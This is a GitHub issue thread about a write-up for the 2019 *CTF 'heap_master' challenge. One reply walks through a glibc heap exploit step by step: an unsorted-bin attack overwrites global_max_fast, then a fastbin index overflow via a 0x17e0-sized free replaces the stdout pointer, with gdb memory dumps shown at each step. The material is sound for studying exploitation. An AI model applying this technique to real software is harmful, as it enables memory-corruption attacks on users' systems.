### ISSUE TITLE
About heap_master in 2019*ctf

### ISSUE THREAD

**Issue by V1NKe** [balsn/ctf_writeup#6]
Hello,balsn!
In my opinion, free the chunk size 0x17e0 after overwriting global_max_fast, it just does nothing and would be in the fastbin area.How does it change the stdout?How to fake the _flags 0xfbad3c80?

**Comment by tensxu** [comment]
Sorry ,
Global_max_fast offset is 0x39f7d0.
Unsortbin attack global_max_fast with 1/16 probability.
Success status:
libc : 0x7fc14bbd7000 (0x????????7000)

1. Ready for unsortbin attack global_max_fast

gdb-peda$ x/8xg 0x41414000+0x1000
0x41415000:     0x0000000000000000      0x0000000000000091
0x41415010:     0x00007fc14bf74b58      0x00007fc14bf767c0
0x41415020:     0x0000000000000000      0x0000000000000000
0x41415030:     0x0000000000000000      0x0000000000000000

gdb-peda$ x/4xg 0x00007fc14bf767c0
0x7fc14bf767c0: 0x0000000000000000      0x0000000000000000
0x7fc14bf767d0: 0x0000000000000080      0x0000000000000000

global_max_fast : 0x7fc14bf767d0

2. Unsortbin attack to overwrite global_max_fast.

gdb-peda$ x/4xg 0x00007fc14bf767c0
0x7fc14bf767c0: 0x0000000000000000      0x0000000000000000
0x7fc14bf767d0: 0x00007fc14bf74b58      0x0000000000000000

0x7fc14bf756e8 `<stdout>`:        0x00007fc14bf75600
main_arena :
0x7fc14bf74b00: 0x0000000100000000      0x0000000000000000
0x7fc14bf74b10: 0x0000000000000000      0x0000000000000000
0x7fc14bf74b20: 0x0000000000000000      0x0000000000000000
0x7fc14bf74b30: 0x0000000000000000      0x0000000000000000
0x7fc14bf74b40: 0x0000000000000000      0x0000000000000000
0x7fc14bf74b50: 0x0000000000000000      0x000055f3eda4a020
0x7fc14bf74b60: 0x0000000000000000      0x0000000041415000
0x7fc14bf74b70: 0x00007fc14bf767c0      0x00007fc14bf74b68
0x7fc14bf74b80: 0x00007fc14bf74b68      0x00007fc14bf74b78
0x7fc14bf74b90: 0x00007fc14bf74b78      0x00007fc14bf74b88
0x7fc14bf74ba0: 0x00007fc14bf74b88      0x00007fc14bf74b98

fastbin start : 0x7fc14bf74b08


In [155]: hex((0x7fc14bf756e8-0x7fc14bf74b08)/8*0x10+0x20)
Out[155]: '0x17e0'

3. Modify stdout to mmap+0x100 with free chunk size 0x17e0.

0x7fc14bf756e8 `<stdout>`:        0x0000000041414100

**Comment by V1NKe** [comment]
nice answer, thanks.It's a "fastbin_index overflow" problem,I got it.  :p
